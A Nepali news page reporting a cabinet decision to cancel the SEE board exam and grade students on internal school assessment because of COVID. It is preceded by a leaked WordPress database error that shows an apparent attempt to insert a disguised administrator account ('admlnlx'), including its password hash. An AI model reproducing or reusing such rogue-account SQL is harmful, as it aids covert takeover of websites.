WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbjBSMoo08jIAAuCq7CiXdtXrnFDly1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:56:09', '', 'admlnlx', 'admlnlx')

एसईई को बोर्ड परीक्षा सन्चालन नगर्ने मन्त्रिपरिषद्‌‌को निर्णय – Gaule Khabar

एसईई को बोर्ड परीक्षा सन्चालन नगर्ने मन्त्रिपरिषद्‌‌को निर्णय

विद्यालयको आन्तरिम मूल्यांकनका आधारमा ग्रेड निर्धारण ...

एसईई को बोर्ड परीक्षा सन्चालन नगर्ने मन्त्रिपरिषद्‌‌को निर्णय

 

जेठ २८, काठमाडौं- यस वर्ष माध्यमिक शिक्षा परीक्षा (एसईई) को बोर्ड परीक्षा सन्चालन नगर्ने मन्त्रिपरिषद्‌को बैठकले निर्णय गरेको छ । मन्त्रिपरिषद्‌को बुधबार साँझ बसेको बैठकले विद्यालयको आन्तरिम मूल्यांकनका आधारमा ग्रेड निर्धारण गर्ने निर्णय गरेको  अनलाइन खबरमा समाचार प्रकाशित छ  ।

शिक्षा मन्त्रालयले गठन गरेको सुझाव कार्यदलले आन्तरिक मूल्याङ्कन, प्रदेशगतरुपमा परीक्षा लिने वा विद्यमान कानूनलाई संशोधन गरी कक्षा १२ मा मात्रै राष्ट्रियस्तरको एसईई परीक्षा लिने विकल्प दिएको थियो ।

तर तत्काल सार्वजनिक विद्यालयहरूमा क्‌वारेन्टिन स्थल बनाइएकाले तत्काल परीक्षा सम्भव नभएको एक मन्त्रीले बताए । उनका अनुसार लामो समयको बन्दाबन्दीका कारण विद्यार्थीमा परेको असर र कोरोना संक्रमणको बढ्दो जोखिमलाई समेत मध्यनजर गर्दै यो वर्ष एसईईको परीक्षा नगरिएको हो । अब विद्यालयहरूले आन्तरिम मूल्यांकनको नम्बर पठाउनेछन् र  त्यसकै आधारमा परीक्षा बोर्डले ग्रेड निर्धारण गरेर परीक्षाफल सार्वजनिक गर्नेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका